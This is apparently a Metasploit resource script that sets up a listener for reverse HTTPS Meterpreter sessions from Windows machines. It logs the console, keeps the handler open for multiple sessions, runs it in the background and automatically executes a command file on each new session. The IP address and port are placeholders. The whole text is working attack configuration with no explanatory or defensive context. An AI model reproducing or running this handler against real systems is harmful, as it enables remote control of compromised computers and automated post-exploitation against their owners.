spool msfconsole.log
set AutoRunScript multi_console_command -rc /root/MetaHandler/meterpreterCommands.rc
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST [IP ADDRESS]
set LPORT [PORT]
set ExitOnSession false
exploit -j
